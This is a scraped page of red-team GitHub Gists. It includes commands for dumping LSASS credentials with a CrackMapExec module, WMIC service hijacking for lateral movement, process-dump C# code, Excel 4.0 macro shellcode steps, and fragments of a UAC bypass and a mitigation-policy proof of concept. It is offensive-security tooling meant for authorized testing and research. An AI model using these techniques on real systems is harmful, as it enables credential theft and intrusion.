- install pypykatz
pip install pypykatzoutisde your pipenv - Add this file to
cme/module/procdump.py - compile
python setup.py install - run
cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump
AA-2020743
G0ldenGunSec
/ wmicLateralMovement.txt
Created
December 11, 2019 14:55
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
dmaasland
/ Invoke-Procdump.ps1
Created
November 27, 2019 12:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ProcDump { | |
| public static class DbgHelp { | |
| [DllImport("Dbghelp.dll")] | |
| public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); | |
| } | |
| } |
seclib
/ shellcode.xlsm
Created
November 20, 2019 13:00
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL | |
| 1. Open Excel | |
| 2. Click on the active tab | |
| 3. Select "Insérer" | |
| 4. Click on "Macro MS Excel 4.0". | |
| 5. This will create a new worksheet called "Macro1" | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1: |
mpgn
/ areadme.md
Last active
December 6, 2019 17:50
Procdump CME module that dump LSASS process and extract the result with pypykatz
nullbind
/ Import-ADandGPO.ps1
Last active
July 11, 2020 12:12
This is an example of how to import the Active Directory and GPO command PowerShell modules on the fly.
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # --------------------------------------------------- | |
| # Load the Active Directory PowerShell module | |
| # --------------------------------------------------- | |
| # $ADModuleBytes = [System.IO.File]::ReadAllBytes("C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.ActiveDirectory.Management.dll") | |
| # $ADModuleString = [System.Convert]::ToBase64String($ADModuleBytes) | |
| # Set the string | |
| $ADModuleString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAHYH/eAAAAAAAAAAAOAAIiALATAAAOgRAAAIAAAAAAAAxtQRAAAgAAAAIBIAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgEgAAAgAA9F8SAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHPUEQBPAAAAACASACQFAAAAAAAAAAAAAAAAAAAAAAAAAEASAAwAAADA0xEAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5OcRAAAgAAAA6BEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy |
saelo
/ 3_years_of_attacking_javascript_engines.txt
Created
October 27, 2019 16:04
3 Years of Attacking JavaScript Engines
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=------------------------------=[ saelo ]=------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| The following are some brief notes about the changes that have taken place | |
| since the release of the "Attacking JavaScript Engines" paper [1]. In | |
| general, no big conceptional changes have happened since. Mitigations have | |
| been added to break some of the presented techniques and, as expected, a |
xpn
/ PCMPBNMBAO_x86_poc.vba
Created
October 26, 2019 23:31
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
| ' by @_xpn_ | |
| ' | |
| ' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
| Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
| Const HEAP_ZERO_MEMORY = &H8& | |
| Const SW_HIDE = &H0& | |
| Const MAX_PATH = 260 | |
| Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
hfiref0x
/ akagi_58a.c
Created
October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IEditionUpgradeManager IEditionUpgradeManager; | |
| typedef struct IEditionUpgradeManagerVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IEditionUpgradeManager * This, | |
| __RPC__in REFIID riid, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import r2pipe | |
| r2 = r2pipe.open() | |
| a = r2.cmd('ii~__assert_rtn[1]').strip() | |
| if not a: | |
| print('[assnam] Cannot find assert_rtn import') | |
| exit(1) | |
| if int(r2.cmd('aflc')) == 0: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based on https://twitter.com/stokfredrik/status/1185580290108018694 | |
| # Turns into a bash function to ease use further | |
| # Relies on: | |
| # - https://github.com/tomnomnom/unfurl | |
| # - https://github.com/michenriksen/aquatone | |
| # - https://cli.shodan.io/ | |
| # Put this function in your .bash_profile or .bashrc file and then source it and you can use it like so: | |
| # $ prowl elasticsearch | |
| function prowl { |